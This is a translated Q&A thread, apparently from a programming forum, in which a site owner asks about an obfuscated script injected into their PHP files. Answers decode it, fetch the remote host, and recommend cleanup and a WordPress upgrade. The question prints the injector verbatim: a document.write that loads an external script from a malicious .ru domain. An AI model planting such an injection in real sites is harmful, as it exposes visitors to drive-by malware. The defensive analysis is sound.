Javascript PHP文件中的Iframe恶意代码？

我在我的网站的PHP文件中发现了以下代码。我想有人能够破解我的ftp，或者以某种方式将这个脚本添加到我的PHP文件中，但我不知道怎么做

<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->

/*异常*/document.write（“”）；

但我想知道上面代码的含义，我想它是以HTML格式或其他形式加密的，但是上面的代码实际上在做什么，以及有人如何将其注入我的网站

---

谢谢。

上面的脚本src将生成地址

http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

它通过网站/脚本中的安全漏洞或直接通过ftp进入您的文件

---

确保尽快清除此恶意代码中的文件，更改ftp密码并修复安全漏洞

我认为它没有任何作用。它有相同的URL，所以我不会在这里重复

当我尝试用IE6的用户代理头（将头记录到文件中）用

curl

检索它时，我得到了以下头：

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Feb 2010 21:37:13 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 2

此外，该文件的内容似乎只是一个CRLF。没什么特别的

---

我不知道他们为什么把它放在那里，但也许曾经有恶意的东西，但现在没有了。。。或者他们只是在等待一段时间，以便在那里放置一些恶意代码。

我可以很容易地做前两件事，但是“修复您的安全缺陷”怎么样？我会检查代码中的缺陷类型。可以使用哪些方法注入此代码，以及如何注入？因为他们是如何从我的网站直接写入我的文件的？@Prashant听起来你基本上需要了解网络安全。有人攻击您的服务器并更改文件的方式很多。可能是通过PHP代码，也可能是通过Web服务器（或邮件服务器等）中的漏洞，甚至可能是他们通过开发系统上的间谍软件获得了您的密码。您是在运行自己的服务器，还是在托管/共享主机上？您是否使用Wordpress或web框架之类的工具？您使用的是FTP（以明文形式发送密码）还是sftp？如果您运行论坛或图像库等应用程序，请尝试升级到最新版本。这些应用程序通常有安全漏洞，很容易被发现和利用，因为源代码是公开的。是的，我正在运行Wordpress，我认为它是从那里注入的，因为我运行的是wp 2.8.3，而wp的当前版本是2.9.1。这是一篇很有帮助的博客文章：